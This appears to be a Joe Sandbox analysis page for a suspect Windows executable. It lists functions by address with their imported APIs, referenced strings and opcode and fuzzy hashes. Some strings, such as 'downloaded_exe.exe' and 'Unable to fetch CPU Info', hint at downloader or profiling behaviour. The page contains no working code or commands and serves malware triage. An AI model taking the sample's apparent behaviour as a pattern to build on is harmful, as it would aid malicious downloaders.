Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CurrentDebugOutputStringThreadabort
String ID: Error cleaning up spin_keys for thread %lu.
API String ID: 3512971422-1576690263
Opcode ID: 40165cbe56e2bd290fffda475dc4b57b528b373ef102451ed211ded201f74b40
Instruction ID: 6c1c46ad2c926ca157b07e82a95520c4789584633fc252ab189e4c55ba36575a
Opcode Fuzzy Hash: 40165cbe56e2bd290fffda475dc4b57b528b373ef102451ed211ded201f74b40
Instruction Fuzzy Hash: 6901EC32518B4581E710EB15F45436BB7B0FBC8788F945134EAD9077A8CF7DD1488BA1

Function 00007FF7FE8FE770 Relevance: 6.4, APIs: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE8FE809
memcpy.MSVCRT ref: 00007FF7FE8FE822
free.MSVCRT ref: 00007FF7FE8FE82D

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 5690d99ab317ed6d7dc083bb0b47c9fd413371d1f2a4b2f0a8eb003c1a0a12da
Instruction ID: 7e10756465d4ea942987c3fe637518898a04856f86d090fd395d0d1218d9da62
Opcode Fuzzy Hash: 5690d99ab317ed6d7dc083bb0b47c9fd413371d1f2a4b2f0a8eb003c1a0a12da
Instruction Fuzzy Hash: FD410322E3968241FB657B219D0027DD292AFE57B0FD46630DE7D17AC0DE2CE45182E0

Function 00007FF7FE90C9D0 Relevance: 6.3, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF7FE90CA03
free.MSVCRT ref: 00007FF7FE90CA11
free.MSVCRT ref: 00007FF7FE90CA1F

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6e3e95b6401c8af36b551520a703a64c6ad29caacd36fd805728053019c180ab
Instruction ID: fef2cceee479c52d01fe6645594c9dfed358f95634f45d648c3cd4cdbb3b293a
Opcode Fuzzy Hash: 6e3e95b6401c8af36b551520a703a64c6ad29caacd36fd805728053019c180ab
Instruction Fuzzy Hash: 61315722A09A4294EB55EF3594113B9A391AF84B90FC44631CB3E5B2C0CEACA442D3B3

Function 00007FF7FE903F40 Relevance: 6.2, APIs: 4, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c4aef84b536972be0cbff9f3997fe47552e227ec24d2f3148c8121f1c1efe8
Instruction ID: 7307492a27d2c910ef7121349c7ff3e2b9099a31b1191d2505497eb538751e0c
Opcode Fuzzy Hash: 55c4aef84b536972be0cbff9f3997fe47552e227ec24d2f3148c8121f1c1efe8
Instruction Fuzzy Hash: B591B6B3E0815686E765EF388404339AAA1EB94B58FC58234CF2C573C5CA3DED4187B2

Function 00007FF7FE8F8D07 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 237COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7FE8FB6E6
{lambda, xrefs: 00007FF7FE8F8D07
}, xrefs: 00007FF7FE8F9F9C

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: ${lambda$}
API String ID: 0-105588721
Opcode ID: 67e98443399238c3ce3d913e9b4fac2a5d192fd5330865d8e9aebab72ba83831
Instruction ID: 09dad5dacbc7527f3562734c205364b9f6f65a7f0b900ad73253ab08f92cd750
Opcode Fuzzy Hash: 67e98443399238c3ce3d913e9b4fac2a5d192fd5330865d8e9aebab72ba83831
Instruction Fuzzy Hash: F5C18C326187C28AE751AF24D0003E977A1EBA4B48F5C8035DEA90B789DF79D4A5D3B0

Function 00007FF7FE980500 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE9805B4

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 7e2fd971f622ae090f4eb8c9ee467f950c775d81f8aaaa0fd2fbf69577ea6e04
Instruction ID: af6ed31061106e9b68d07a6c4b4e507e1bbcdc97b58ab51a4af49010aecd4686
Opcode Fuzzy Hash: 7e2fd971f622ae090f4eb8c9ee467f950c775d81f8aaaa0fd2fbf69577ea6e04
Instruction Fuzzy Hash: 82518D62A08A9185EB20EF26E4001ADA7A5FBC9B84FC84132DE9C077D5CE2CD651C771

Function 00007FF7FE97B620 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

basic_string::erase, xrefs: 00007FF7FE97B6DA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE97B6E1

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
API String ID: 0-2652434754
Opcode ID: 41a59b8b661dac5815fed5232029d1a1adf811718dd425600f22af2c26aee1f2
Instruction ID: 158817d9bd5c5cb064462b7fbffeebe09c627f401d2b8eab52735619c374b95e
Opcode Fuzzy Hash: 41a59b8b661dac5815fed5232029d1a1adf811718dd425600f22af2c26aee1f2
Instruction Fuzzy Hash: 2351E172B19A4684EB01EF2AD4442BDA761AB81BE4FD48132DF2C437D4EE3CD545C3A2

Function 00007FF7FE91FD70 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF7FE91FDB3
strlen.MSVCRT ref: 00007FF7FE91FE48

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE91FDF6, 00007FF7FE91FEE7

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: e4c6ca565100df24997f8b9ae7a7cbf619bdb28dd67fbc3ed11c5325d9d2914c
Instruction ID: 1b820226cec53e453cde7ff419afa1e42d3d585d37123798de13fb98fbe5766e
Opcode Fuzzy Hash: e4c6ca565100df24997f8b9ae7a7cbf619bdb28dd67fbc3ed11c5325d9d2914c
Instruction Fuzzy Hash: 64414C26A09B4989EB20EF29E44016DA760FB88BE4B884531DE6C077A5DF2CE551C3B1

Function 00007FF7FE97AAD0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 142COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE97AC79
basic_string::assign, xrefs: 00007FF7FE97ABA3, 00007FF7FE97AC72

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 0-2669816585
Opcode ID: 0c697e9f95c0d1b8468da6a1ef89d67c9822de640c51fd44753c320e0d0868ea
Instruction ID: 7dee52b108a7e882a708b2691cd0b46e7fb7bf67ec9b01594599c9d055ff357c
Opcode Fuzzy Hash: 0c697e9f95c0d1b8468da6a1ef89d67c9822de640c51fd44753c320e0d0868ea
Instruction Fuzzy Hash: D2410262B29A4680EB10EB2AD4001BDE751ABC5FD4FD48132DE2C073C5DE6CE58683B2

Function 00007FF7FE91F760 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF7FE91F7A3
strlen.MSVCRT ref: 00007FF7FE91F838

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE91F7E6, 00007FF7FE91F8D7

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 30eaad9f3e335faee3aa3ade173fc2b87478ab2d3f106f096b8625dc526a31f2
Instruction ID: 11ef1402bdc23de8f51f1f7d859bb29a0c6c29c57d235f080d18882f7aca88e8
Opcode Fuzzy Hash: 30eaad9f3e335faee3aa3ade173fc2b87478ab2d3f106f096b8625dc526a31f2
Instruction Fuzzy Hash: 16416122A19B4989EB20EF29E4401ADA760FF88BD4B844532DE6D077E5DF3CD541C3B1

Function 00007FF7FE9A5380 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF7FE9A540E
memcpy.MSVCRT ref: 00007FF7FE9A542C

Strings

basic_string::_M_replace, xrefs: 00007FF7FE9A54A9
Unable to fetch CPU Info, xrefs: 00007FF7FE9A5382, 00007FF7FE9A5383

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memcpy
String ID: Unable to fetch CPU Info$basic_string::_M_replace
API String ID: 3510742995-1595762409
Opcode ID: 18a9b7d2696cc42be81273f21a5873c4b707bbcf74a126535c488d66a37deda9
Instruction ID: 7848918d7f15d76d2d794af161a82b904346e74dab92456c22a0c4cb73571074
Opcode Fuzzy Hash: 18a9b7d2696cc42be81273f21a5873c4b707bbcf74a126535c488d66a37deda9
Instruction Fuzzy Hash: AE31E622B1D69545EB10EB25940027CE690AF82FE4FD44235EEBD077D5DE2CE44183B2

Function 00007FF7FE922CB0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE922CD0
strlen.MSVCRT ref: 00007FF7FE922D20

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE922CEE, 00007FF7FE922D3E, 00007FF7FE922D8E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 0eb2b6f1ce813d2c15ac58aede2993851a964fb7f832295ba611950778ffe68f
Instruction ID: 042cff8b5a19801c1a0458293beadb93e069e5a20293f1a6952cecd47200817f
Opcode Fuzzy Hash: 0eb2b6f1ce813d2c15ac58aede2993851a964fb7f832295ba611950778ffe68f
Instruction Fuzzy Hash: 16215262B19B1591DF15FB1AE8400E8A320EBC9F847D90431DE5C1B7E5DE2CD58783B1

Function 00007FF7FE909F20 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF7FE909F7A
MultiByteToWideChar.KERNEL32 ref: 00007FF7FE909FBA

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 4b793f624b6b40cfb0971b9c036f8a79a454f43057ceaf3c5a038b6454baff6a
Instruction ID: 9e4ffd046263e12e95427f3bbd4a3be7dd6e07b7e944137ef5e4df7a15b9d108
Opcode Fuzzy Hash: 4b793f624b6b40cfb0971b9c036f8a79a454f43057ceaf3c5a038b6454baff6a
Instruction Fuzzy Hash: 0231C67260C28186E360DF34A410369B7A0BBD5784FC48131EBA8877E4DF7DD5848B72

Function 00007FF7FE97EBC0 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00007FF7FE97EBCB
strlen.MSVCRT ref: 00007FF7FE97EBD6
memcpy.MSVCRT ref: 00007FF7FE97EBFF
setlocale.MSVCRT ref: 00007FF7FE97EC0D

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 9b84bd0d9439c364ee7d6cba5d4889b03c99ff6fb5981b1d703f40922a889318
Instruction ID: 22f5708984b26980152e12ca8eea17646137f0d9e182e240ad7eb6cae36c6e27
Opcode Fuzzy Hash: 9b84bd0d9439c364ee7d6cba5d4889b03c99ff6fb5981b1d703f40922a889318
Instruction Fuzzy Hash: BDF05E12B0924200FF18F72B19460BD81515F89BC0BC48035DD2D1B3C6ED6CE08243B1

Function 00007FF7FE9A0000 Relevance: 5.4, APIs: 4, Instructions: 364stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF7FE9A0077
wcslen.MSVCRT ref: 00007FF7FE9A0112
wcslen.MSVCRT ref: 00007FF7FE9A01A9
strlen.MSVCRT ref: 00007FF7FE9A0241

Part of subcall function 00007FF7FE914BE0: memcpy.MSVCRT ref: 00007FF7FE914C15

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: wcslen$memcpystrlen
String ID:
API String ID: 3111578849-0
Opcode ID: e746d04f4f355a2c5af6b9886f5052732e00b054ba20d3a26ba81b4f1448f00b
Instruction ID: 915f6eff5269bd266a5a47b03bba5a5e66eca0ddef3d054c382db4dc375d2ba7
Opcode Fuzzy Hash: e746d04f4f355a2c5af6b9886f5052732e00b054ba20d3a26ba81b4f1448f00b
Instruction Fuzzy Hash: 9FF13A62A09A4685DB50EB6AE44016DA362FBC4FE4F800236EEAD477E5DF6CD540C3B1

Function 00007FF7FE99F7A0 Relevance: 5.4, APIs: 4, Instructions: 364stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF7FE99F817
wcslen.MSVCRT ref: 00007FF7FE99F8B2
wcslen.MSVCRT ref: 00007FF7FE99F949
strlen.MSVCRT ref: 00007FF7FE99F9E1

Part of subcall function 00007FF7FE914BE0: memcpy.MSVCRT ref: 00007FF7FE914C15

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: wcslen$memcpystrlen
String ID:
API String ID: 3111578849-0
Opcode ID: 13c283358e737a611b026bbe994eab8e0c5b044b596d3a68b65405900c9fea3f
Instruction ID: 3f22e45c36487af6a99d3d22103cebfaa9c7cdf470452dc4a461aaf6bd2ffa23
Opcode Fuzzy Hash: 13c283358e737a611b026bbe994eab8e0c5b044b596d3a68b65405900c9fea3f
Instruction Fuzzy Hash: D5F13862A08A4685DB50EF2AE44017DE365FBC4BE4F844232EE6D477E5DF6CE540C3A2

Function 00007FF7FE90D6D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

downloaded_exe.exe, xrefs: 00007FF7FE90D6D6

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: downloaded_exe.exe
API String ID: 0-1849240386
Opcode ID: 96c83e347f731e7a93162deb43558a64de0191c725f51941e54a4d0192021051
Instruction ID: a381dce199741e20bb41740bad23ebcdc4145950fdc54da2519d3c97a4355067
Opcode Fuzzy Hash: 96c83e347f731e7a93162deb43558a64de0191c725f51941e54a4d0192021051
Instruction Fuzzy Hash: 3D319FA2F0D64246FB16EB299981379A241AFC4784FC49035DF2D477C5DE3DA88293B2

Function 00007FF7FE99EF60 Relevance: 5.4, APIs: 4, Instructions: 351stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE99EFD8

Part of subcall function 00007FF7FE914BE0: memcpy.MSVCRT ref: 00007FF7FE914C15

strlen.MSVCRT ref: 00007FF7FE99F060
strlen.MSVCRT ref: 00007FF7FE99F0E3
strlen.MSVCRT ref: 00007FF7FE99F167

Memory Dump Source

